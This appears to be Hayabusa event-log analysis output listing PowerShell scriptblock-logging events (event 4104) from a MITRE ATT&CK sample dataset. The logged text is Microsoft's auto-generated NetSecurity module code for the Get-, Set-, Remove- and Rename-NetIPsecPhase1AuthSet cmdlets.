[Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecPhase1AuthSet' function Set-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] 
${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 
$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecPhase1AuthSet' function Remove-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # 
.EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', Pos",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.942 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"itionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
